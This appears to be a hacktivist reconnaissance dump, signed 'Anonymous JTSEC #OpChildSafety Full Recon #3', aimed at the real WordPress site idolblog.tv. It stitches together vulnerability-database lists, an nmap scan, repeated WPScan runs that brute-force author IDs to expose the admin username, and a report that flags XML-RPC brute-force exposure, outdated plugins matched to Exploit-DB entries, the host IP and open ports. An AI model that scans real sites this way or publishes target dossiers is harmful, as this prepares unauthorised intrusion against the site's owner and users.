18051| [76762] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-6295 Denial of Service Vulnerability
18052| [76329] Cisco Nexus 9000 Series Software CVE-2015-4301 Remote Denial of Service Vulnerability
18053| [76057] Cisco Firepower 9000 Series Devices CVE-2015-4287 Information Disclosure Vulnerability
18054| [75471] Cisco Unified IP Phones 9900 Series CVE-2015-4226 Denial of Service Vulnerability
18055| [75378] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-4213 Information Disclosure Vulnerability
18056| [74029] Cisco ASR 9000 Series Routers CVE-2015-0694 Remote Security Bypass Vulnerability
18057| [73895] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-0686 Denial of Service Vulnerability
18058| [73470] Cisco ASR 9000 Series Routers CVE-2015-0685 Denial of Service Vulnerability
18059| [73318] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-0672 Denial of Service Vulnerability
18060| [72485] Cisco Unified IP Phones 9900 Series CVE-2015-0604 Arbitrary File Upload Vulnerability
18061| [72484] Cisco Unified IP Phones 9900 Series CVE-2015-0603 Local Denial of Service Vulnerability
18062| [72483] Cisco Unified IP Phones 9900 Series CVE-2015-0601 Local Denial of Service Vulnerability
18063| [72482] Cisco Unified IP Phones 9900 Series CVE-2015-0602 Information Disclosure Vulnerability
18064| [72481] Cisco Unified IP Phones 9900 Series CVE-2015-0600 Denial of Service Vulnerability
18065| [71979] Cisco MDS 9000 NX-OS Software CVE-2015-0582 Denial of Service Vulnerability
18066| [70744] Cisco ASR 901 Series Routers CVE-2014-3293 Denial of Service Vulnerability
18067| [70658] ZTE ZXDSL 931VII 'manager_dev_config_t.gch' Information Disclosure Vulnerability
18068| [69057] Cisco Nexus 9000 Series Switches CVE-2014-3330 Access List Security Bypass Vulnerability
18069| [64770] Cisco Unified IP Phones 9900 Series Crafted Header Unregister Denial of Service Vulnerability
18070| [63564] Cisco MDS 9000 NX-OS Software VRRP Frames Denial of Service Vulnerability
18071| [62944] Cisco Unified IP Phones 9900 Series CVE-2013-5532 Buffer Overflow Vulnerability
18072| [62943] Cisco Unified IP Phones 9900 Series CVE-2013-5533 Local Command Injection Vulnerability
18073| [62905] Cisco Unified IP Phones 9900 Series CVE-2013-5526 Denial of Service Vulnerability
18074| [61330] Cisco Unified IP Phones 9900 Series CVE-2013-3426 Arbitrary File Download Vulnerability
18075| [49633] Oracle Application Server 9i 'httpd.conf' Information Disclosure Vulnerability
18076| [48811] Cisco ASR 9000 Series Routers IP Version 4 Denial of Service Vulnerability
18077| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
18078| [15542] NetObjects Fusion 9 Information Disclosure Vulnerability
18079| [6556] Oracle 9i Application Server Sample Scripts Information Disclosure Vulnerability
18080| [6459] Oracle 9i Application Server Java Server Page Source Code Disclosure Vulnerability
18081| [5335] Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
18082| [4290] Oracle 9i Default Configuration File Information Disclosure Vulnerability
18083| [4034] Oracle 9IAS OracleJSP Information Disclosure Vulnerability
18084| [3848] Mandrake Bind 9 Package Insecure File Permissions Vulnerability
18085| [2516] Microsoft Plus! 98 Windows ME Password Disclosure Vulnerability
18086|
18087| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18088| [85799] Cisco Unified IP Phones 9900 Series directory traversal
18089| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
18090| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
18091| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
18092| [9250] BIND 9 dns_message_findtype() denial of service
18093| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
18094| [539] Microsoft Windows 95 and Internet Explorer password disclosure
18095| [86004] ISC BIND RDATA denial of service
18096| [84767] ISC BIND denial of service
18097| [83066] ISC BIND denial of service
18098| [81504] ISC BIND AAAA denial of service
18099| [80510] ISC BIND DNS64 denial of service
18100| [79121] ISC BIND queries denial of service
18101| [78479] ISC BIND RDATA denial of service
18102| [77185] ISC BIND TCP queries denial of service
18103| [77184] ISC BIND bad cache denial of service
18104| [76034] ISC BIND rdata denial of service
18105| [73053] ISC BIND cache update policy security bypass
18106| [71332] ISC BIND recursive queries denial of service
18107| [68375] ISC BIND UPDATE denial of service
18108| [68374] ISC BIND Response Policy Zones denial of service
18109| [67665] ISC BIND RRSIG Rrsets denial of service
18110| [67297] ISC BIND RRSIG denial of service
18111| [65554] ISC BIND IXFR transfer denial of service
18112| [63602] ISC BIND allow-query security bypass
18113| [63596] ISC BIND zone data security bypass
18114| [63595] ISC BIND RRSIG denial of service
18115| [62072] ISC BIND DNSSEC query denial of service
18116| [62071] ISC BIND ACL security bypass
18117| [61871] ISC BIND anchors denial of service
18118| [60421] ISC BIND RRSIG denial of service
18119| [56049] ISC BIND out-of-bailiwick weak security
18120| [55937] ISC Bind unspecified cache poisoning
18121| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
18122| [54416] ISC BIND DNSSEC cache poisoning
18123| [52073] ISC BIND dns_db_findrdataset() denial of service
18124| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
18125| [45234] ISC BIND UDP denial of service
18126| [39670] ISC BIND inet_network buffer overflow
18127| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
18128| [37128] RHSA update for ISC BIND RRset denial of service not installed
18129| [37127] RHSA update for ISC BIND named service denial of service not installed
18130| [36275] ISC BIND DNS query spoofing
18131| [35575] ISC BIND query ID cache poisoning
18132| [35571] ISC BIND ACL security bypass
18133| [31838] ISC BIND RRset denial of service
18134| [31799] ISC BIND named service denial of service
18135| [29876] HP Tru64 ypbind core dump information disclosure
18136| [28745] ISC BIND DNSSEC RRset denial of service
18137| [28744] ISC BIND recursive INSIST denial of service
18138| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
18139| [18836] BIND hostname disclosure
18140| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
18141| [10333] ISC BIND SIG null pointer dereference denial of service
18142| [10332] ISC BIND OPT resource record (RR) denial of service
18143| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
18144| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
18145| [5814] ISC BIND "
18146| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
18147| [5462] ISC BIND AXFR host command remote buffer overflow
18148|
18149| Exploit-DB - https://www.exploit-db.com:
18150| [24689] cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure
18151| [23059] Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability
18152| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
18153|
18154| OpenVAS (Nessus) - http://www.openvas.org:
18155| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
18156| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
18157| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
18158| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
18159| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
18160| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
18161| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
18162| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
18163| [11226] Oracle 9iAS default error information disclosure
18164|
18165| SecurityTracker - https://www.securitytracker.com:
18166| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
18167| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
18168| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
18169| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
18170| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
18171| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18172| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18173| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18174| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18175| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18176| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18177| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18178| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18179| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18180| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
18181| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
18182| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
18183| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
18184| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
18185| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
18186| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
18187| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
18188| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
18189| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
18190| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
18191| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
18192|
18193| OSVDB - http://www.osvdb.org:
18194| [86219] Cardiac Science G3 Plus 9390A-501 AED AEDUpdate Cleartext Password Local Disclosure
18195| [22517] MPN HP-180W Wireless IP Phone UDP Port 9090 Information Disclosure
18196| [22516] ZyXEL P-2000W_v2 VoIP Wi-Fi Phone UDP Port 9090 Information Disclosure
18197| [21292] ZyXEL P2000W UDP 9090 Remote Information Disclosure
18198|_
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
88/udp closed kerberos-sec
123/udp closed ntp
137/udp filtered netbios-ns
138/udp filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
389/udp closed ldap
520/udp closed route
2049/udp closed nfs
Too many fingerprints match this host to give specific OS details
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7

TRACEROUTE (using port 137/udp)
HOP RTT ADDRESS
1 ... 2
3 169.35 ms 10.247.200.1
4 171.90 ms 10.247.200.1
5 171.89 ms 10.247.200.1
6 171.88 ms 10.247.200.1
7 171.86 ms 10.247.200.1
8 171.78 ms 10.247.200.1
9 171.79 ms 10.247.200.1
10 170.85 ms 10.247.200.1
11 ... 18
19 170.41 ms 10.247.200.1
20 172.95 ms 10.247.200.1
21 ... 27
28 171.08 ms 10.247.200.1
29 ...
30 169.24 ms 10.247.200.1

NSE: Script Post-scanning.
Initiating NSE at 04:12
Completed NSE at 04:12, 0.00s elapsed
Initiating NSE at 04:12
Completed NSE at 04:12, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.55 seconds
 Raw packets sent: 129 (9.573KB) | Rcvd: 239 (37.313KB)
18244#######################################################################################################################################
18245[+] URL: http://idolblog.tv/
18246[+] Started: Sat Jul 20 02:50:14 2019
18247
18248Interesting Finding(s):
18249
18250[+] http://idolblog.tv/
18251 | Interesting Entries:
18252 | - Server: Apache/2
18253 | - Upgrade: h2,h2c
18254 | - X-Powered-By: PHP/5.6.35
18255 | Found By: Headers (Passive Detection)
18256 | Confidence: 100%
18257
18258[+] http://idolblog.tv/robots.txt
18259 | Interesting Entries:
18260 | - /wp-admin/
18261 | - /wp-admin/admin-ajax.php
18262 | Found By: Robots Txt (Aggressive Detection)
18263 | Confidence: 100%
18264
18265[+] http://idolblog.tv/xmlrpc.php
18266 | Found By: Link Tag (Passive Detection)
18267 | Confidence: 100%
18268 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
18269 | References:
18270 | - http://codex.wordpress.org/XML-RPC_Pingback_API
18271 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
18272 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
18273 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
18274 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
18275
18276[+] http://idolblog.tv/readme.html
18277 | Found By: Direct Access (Aggressive Detection)
18278 | Confidence: 100%
18279
18280[+] http://idolblog.tv/wp-cron.php
18281 | Found By: Direct Access (Aggressive Detection)
18282 | Confidence: 60%
18283 | References:
18284 | - https://www.iplocation.net/defend-wordpress-from-ddos
18285 | - https://github.com/wpscanteam/wpscan/issues/1299
18286
18287[+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
18288 | Detected By: Rss Generator (Passive Detection)
18289 | - http://idolblog.tv/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18290 | - http://idolblog.tv/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18291
18292[+] WordPress theme in use: twentytwelve
18293 | Location: http://idolblog.tv/wp-content/themes/twentytwelve/
18294 | Last Updated: 2019-05-07T00:00:00.000Z
18295 | [!] The version is out of date, the latest version is 3.0
18296 | Style URL: http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2
18297 | Style Name: Twenty Twelve
18298 | Style URI: http://wordpress.org/themes/twentytwelve
18299 | Description: The 2012 theme for WordPress is a fully responsive theme that looks great on any device. Features in...
18300 | Author: the WordPress team
18301 | Author URI: http://wordpress.org/
18302 |
18303 | Detected By: Css Style (Passive Detection)
18304 |
18305 | Version: 1.3 (80% confidence)
18306 | Detected By: Style (Passive Detection)
18307 | - http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2, Match: 'Version: 1.3'
18308
18309[+] Enumerating All Plugins (via Passive Methods)
18310[+] Checking Plugin Versions (via Passive and Aggressive Methods)
18311
18312[i] Plugin(s) Identified:
18313
18314[+] bwp-recent-comments
18315 | Location: http://idolblog.tv/wp-content/plugins/bwp-recent-comments/
18316 | Latest Version: 1.2.2 (up to date)
18317 | Last Updated: 2013-10-28T07:51:00.000Z
18318 |
18319 | Detected By: Urls In Homepage (Passive Detection)
18320 |
18321 | Version: 1.2.2 (100% confidence)
18322 | Detected By: Readme - Stable Tag (Aggressive Detection)
18323 | - http://idolblog.tv/wp-content/plugins/bwp-recent-comments/readme.txt
18324 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
18325 | - http://idolblog.tv/wp-content/plugins/bwp-recent-comments/readme.txt
18326
18327[+] wp-pagenavi
18328 | Location: http://idolblog.tv/wp-content/plugins/wp-pagenavi/
18329 | Last Updated: 2018-12-19T04:50:00.000Z
18330 | [!] The version is out of date, the latest version is 2.93
18331 |
18332 | Detected By: Urls In Homepage (Passive Detection)
18333 |
18334 | Version: 2.92 (80% confidence)
18335 | Detected By: Readme - Stable Tag (Aggressive Detection)
18336 | - http://idolblog.tv/wp-content/plugins/wp-pagenavi/readme.txt
18337
18338[+] Enumerating Config Backups (via Passive and Aggressive Methods)
18339 Checking Config Backups - Time: 00:00:04 <=============> (21 / 21) 100.00% Time: 00:00:04
18340
18341[i] No Config Backups Found.
18342
18343
18344[+] Finished: Sat Jul 20 02:50:44 2019
18345[+] Requests Done: 46
18346[+] Cached Requests: 18
18347[+] Data Sent: 9.071 KB
18348[+] Data Received: 195.779 KB
18349[+] Memory used: 182.906 MB
18350[+] Elapsed time: 00:00:30
18351#######################################################################################################################################
18352[+] URL: http://idolblog.tv/
18353[+] Started: Sat Jul 20 02:50:09 2019
18354
18355Interesting Finding(s):
18356
18357[+] http://idolblog.tv/
18358 | Interesting Entries:
18359 | - Server: Apache/2
18360 | - Upgrade: h2,h2c
18361 | - X-Powered-By: PHP/5.6.35
18362 | Found By: Headers (Passive Detection)
18363 | Confidence: 100%
18364
18365[+] http://idolblog.tv/robots.txt
18366 | Interesting Entries:
18367 | - /wp-admin/
18368 | - /wp-admin/admin-ajax.php
18369 | Found By: Robots Txt (Aggressive Detection)
18370 | Confidence: 100%
18371
18372[+] http://idolblog.tv/xmlrpc.php
18373 | Found By: Link Tag (Passive Detection)
18374 | Confidence: 100%
18375 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
18376 | References:
18377 | - http://codex.wordpress.org/XML-RPC_Pingback_API
18378 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
18379 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
18380 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
18381 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
18382
18383[+] http://idolblog.tv/readme.html
18384 | Found By: Direct Access (Aggressive Detection)
18385 | Confidence: 100%
18386
18387[+] http://idolblog.tv/wp-cron.php
18388 | Found By: Direct Access (Aggressive Detection)
18389 | Confidence: 60%
18390 | References:
18391 | - https://www.iplocation.net/defend-wordpress-from-ddos
18392 | - https://github.com/wpscanteam/wpscan/issues/1299
18393
18394[+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
18395 | Detected By: Rss Generator (Passive Detection)
18396 | - http://idolblog.tv/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18397 | - http://idolblog.tv/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18398
18399[+] WordPress theme in use: twentytwelve
18400 | Location: http://idolblog.tv/wp-content/themes/twentytwelve/
18401 | Last Updated: 2019-05-07T00:00:00.000Z
18402 | [!] The version is out of date, the latest version is 3.0
18403 | Style URL: http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2
18404 | Style Name: Twenty Twelve
18405 | Style URI: http://wordpress.org/themes/twentytwelve
18406 | Description: The 2012 theme for WordPress is a fully responsive theme that looks great on any device. Features in...
18407 | Author: the WordPress team
18408 | Author URI: http://wordpress.org/
18409 |
18410 | Detected By: Css Style (Passive Detection)
18411 |
18412 | Version: 1.3 (80% confidence)
18413 | Detected By: Style (Passive Detection)
18414 | - http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2, Match: 'Version: 1.3'
18415
18416[+] Enumerating Users (via Passive and Aggressive Methods)
18417 Brute Forcing Author IDs - Time: 00:00:06 <==> (10 / 10) 100.00% Time: 00:00:06
18418
18419[i] User(s) Identified:
18420
18421[+] idolblog
18422 | Detected By: Rss Generator (Passive Detection)
18423 | Confirmed By:
18424 | Wp Json Api (Aggressive Detection)
18425 | - http://idolblog.tv/wp-json/wp/v2/users/?per_page=100&page=1
18426 | Rss Generator (Aggressive Detection)
18427 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
18428 | Login Error Messages (Aggressive Detection)
18429
18430
18431[+] Finished: Sat Jul 20 02:51:05 2019
18432[+] Requests Done: 58
18433[+] Cached Requests: 7
18434[+] Data Sent: 11.261 KB
18435[+] Data Received: 937.319 KB
18436[+] Memory used: 87.531 MB
18437[+] Elapsed time: 00:00:56
18438#######################################################################################################################################
18439[+] URL: http://idolblog.tv/
18440[+] Started: Sat Jul 20 02:54:56 2019
18441
18442Interesting Finding(s):
18443
18444[+] http://idolblog.tv/
18445 | Interesting Entries:
18446 | - Server: Apache/2
18447 | - Upgrade: h2,h2c
18448 | - X-Powered-By: PHP/5.6.35
18449 | Found By: Headers (Passive Detection)
18450 | Confidence: 100%
18451
18452[+] http://idolblog.tv/robots.txt
18453 | Interesting Entries:
18454 | - /wp-admin/
18455 | - /wp-admin/admin-ajax.php
18456 | Found By: Robots Txt (Aggressive Detection)
18457 | Confidence: 100%
18458
18459[+] http://idolblog.tv/xmlrpc.php
18460 | Found By: Link Tag (Passive Detection)
18461 | Confidence: 100%
18462 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
18463 | References:
18464 | - http://codex.wordpress.org/XML-RPC_Pingback_API
18465 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
18466 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
18467 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
18468 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
18469
18470[+] http://idolblog.tv/readme.html
18471 | Found By: Direct Access (Aggressive Detection)
18472 | Confidence: 100%
18473
18474[+] http://idolblog.tv/wp-cron.php
18475 | Found By: Direct Access (Aggressive Detection)
18476 | Confidence: 60%
18477 | References:
18478 | - https://www.iplocation.net/defend-wordpress-from-ddos
18479 | - https://github.com/wpscanteam/wpscan/issues/1299
18480
18481[+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
18482 | Detected By: Rss Generator (Passive Detection)
18483 | - http://idolblog.tv/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18484 | - http://idolblog.tv/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18485
18486[+] WordPress theme in use: twentytwelve
18487 | Location: http://idolblog.tv/wp-content/themes/twentytwelve/
18488 | Last Updated: 2019-05-07T00:00:00.000Z
18489 | [!] The version is out of date, the latest version is 3.0
18490 | Style URL: http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2
18491 | Style Name: Twenty Twelve
18492 | Style URI: http://wordpress.org/themes/twentytwelve
18493 | Description: The 2012 theme for WordPress is a fully responsive theme that looks great on any device. Features in...
18494 | Author: the WordPress team
18495 | Author URI: http://wordpress.org/
18496 |
18497 | Detected By: Css Style (Passive Detection)
18498 |
18499 | Version: 1.3 (80% confidence)
18500 | Detected By: Style (Passive Detection)
18501 | - http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2, Match: 'Version: 1.3'
18502
18503[+] Enumerating Users (via Passive and Aggressive Methods)
18504 Brute Forcing Author IDs - Time: 00:00:03 <============> (10 / 10) 100.00% Time: 00:00:03
18505
18506[i] User(s) Identified:
18507
18508[+] idolblog
18509 | Detected By: Rss Generator (Passive Detection)
18510 | Confirmed By:
18511 | Wp Json Api (Aggressive Detection)
18512 | - http://idolblog.tv/wp-json/wp/v2/users/?per_page=100&page=1
18513 | Rss Generator (Aggressive Detection)
18514 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
18515 | Login Error Messages (Aggressive Detection)
18516
18517
18518[+] Finished: Sat Jul 20 02:55:13 2019
18519[+] Requests Done: 14
18520[+] Cached Requests: 51
18521[+] Data Sent: 2.756 KB
18522[+] Data Received: 25.951 KB
18523[+] Memory used: 86.953 MB
18524[+] Elapsed time: 00:00:16
18525#######################################################################################################################################
18526[INFO] Date: 20/07/19 | Time: 02:55:40
18527[INFO] ------TARGET info------
18528[*] TARGET: http://idolblog.tv/
18529[*] TARGET IP: 89.248.174.131
18530[INFO] NO load balancer detected for idolblog.tv...
18531[*] DNS servers: ns1.dnsowl.com.
18532[*] TARGET server: Apache/2
18533[*] CC: NL
18534[*] Country: Netherlands
18535[*] RegionCode: NH
18536[*] RegionName: North Holland
18537[*] City: Amsterdam
18538[*] ASN: AS202425
18539[*] BGP_PREFIX: 89.248.174.0/24
18540[*] ISP: INT-NETWORK IP Volume inc, SC
18541[INFO] DNS enumeration:
18542[INFO] Possible abuse mails are:
18543[*] abuse@idolblog.tv
18544[*] abuse@quasinetworks.com
18545[INFO] NO PAC (Proxy Auto Configuration) file FOUND
18546[ALERT] robots.txt file FOUND in http://idolblog.tv/robots.txt
18547[INFO] Checking for HTTP status codes recursively from http://idolblog.tv/robots.txt
18548[INFO] Status code Folders
18549[*] 200 http://idolblog.tv/wp-admin/
18550[INFO] Starting FUZZing in http://idolblog.tv/FUzZzZzZzZz...
18551[INFO] Status code Folders
18552[ALERT] Look in the source code. It may contain passwords
18553[INFO] Links found from http://idolblog.tv/ http://89.248.174.131/:
18749[INFO] GOOGLE has 303,000 results (0.26 seconds) about http://idolblog.tv/
18750[INFO] BING shows 89.248.174.131 is shared with 79 hosts/vhosts
18751[INFO] Shodan detected the following opened ports on 89.248.174.131:
18752[*] 1
18753[*] 110
18754[*] 111
18755[*] 143
18756[*] 22
18757[*] 25
18758[*] 3306
18759[*] 4
18760[*] 443
18761[*] 465
18762[*] 53
18763[*] 80
18764[*] 993
18765[*] 995
18766[INFO] ------VirusTotal SECTION------
18767[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
18768[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
18769[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
18770[INFO] ------Alexa Rank SECTION------
18771[INFO] Percent of Visitors Rank in Country:
18772[INFO] Percent of Search Traffic:
18773[INFO] Percent of Unique Visits:
18774[INFO] Total Sites Linking In:
18775[*] Total Sites
18776[INFO] Useful links related to idolblog.tv - 89.248.174.131:
18777[*] https://www.virustotal.com/pt/ip-address/89.248.174.131/information/
18778[*] https://www.hybrid-analysis.com/search?host=89.248.174.131
18779[*] https://www.shodan.io/host/89.248.174.131
18780[*] https://www.senderbase.org/lookup/?search_string=89.248.174.131
18781[*] https://www.alienvault.com/open-threat-exchange/ip/89.248.174.131
18782[*] http://pastebin.com/search?q=89.248.174.131
18783[*] http://urlquery.net/search.php?q=89.248.174.131
18784[*] http://www.alexa.com/siteinfo/idolblog.tv
18785[*] http://www.google.com/safebrowsing/diagnostic?site=idolblog.tv
18786[*] https://censys.io/ipv4/89.248.174.131
18787[*] https://www.abuseipdb.com/check/89.248.174.131
18788[*] https://urlscan.io/search/#89.248.174.131
18789[*] https://github.com/search?q=89.248.174.131&type=Code
18790[INFO] Useful links related to AS202425 - 89.248.174.0/24:
18791[*] http://www.google.com/safebrowsing/diagnostic?site=AS:202425
18792[*] https://www.senderbase.org/lookup/?search_string=89.248.174.0/24
18793[*] http://bgp.he.net/AS202425
18794[*] https://stat.ripe.net/AS202425
18795[INFO] Date: 20/07/19 | Time: 02:57:28
18796[INFO] Total time: 1 minute(s) and 48 second(s)
18797######################################################################################################################################
[-] Date & Time: 20/07/2019 02:53:19
[I] Threads: 5
[-] Target: http://idolblog.tv (89.248.174.131)
[M] Website Not in HTTPS: http://idolblog.tv
[I] Server: Apache/2
[I] X-Powered-By: PHP/5.6.35
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://idolblog.tv/robots.txt
[I] CMS Detection: WordPress
[I] Wordpress Version: 5.2.2
[I] Wordpress Theme: twentytwelve
[-] WordPress usernames identified:
[M] idolblog
[M] XML-RPC services are enabled
[M] Website vulnerable to XML-RPC Brute Force Vulnerability
[I] Autocomplete Off Not Found: http://idolblog.tv/wp-login.php
[-] Default WordPress Files:
[I] http://idolblog.tv/license.txt
[I] http://idolblog.tv/readme.html
[I] http://idolblog.tv/wp-content/themes/twentynineteen/readme.txt
[I] http://idolblog.tv/wp-includes/ID3/license.commercial.txt
[I] http://idolblog.tv/wp-includes/ID3/license.txt
[I] http://idolblog.tv/wp-includes/ID3/readme.txt
[I] http://idolblog.tv/wp-includes/images/crystal/license.txt
[I] http://idolblog.tv/wp-includes/js/plupload/license.txt
[I] http://idolblog.tv/wp-includes/js/swfupload/license.txt
[I] http://idolblog.tv/wp-includes/js/tinymce/license.txt
[-] Searching Wordpress Plugins ...
[I] akismet
[M] EDB-ID: 37826 "WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities"
[M] EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
[I] bwp-recent-comments v1.2.2
[I] feed
[M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
[I] wp-pagenavi v2.92
[I] Checking for Directory Listing Enabled ...
[-] Date & Time: 20/07/2019 03:00:24
[-] Completed in: 0:07:05
#######################################################################################################################################
Anonymous JTSEC #OpChildSafety Full Recon #3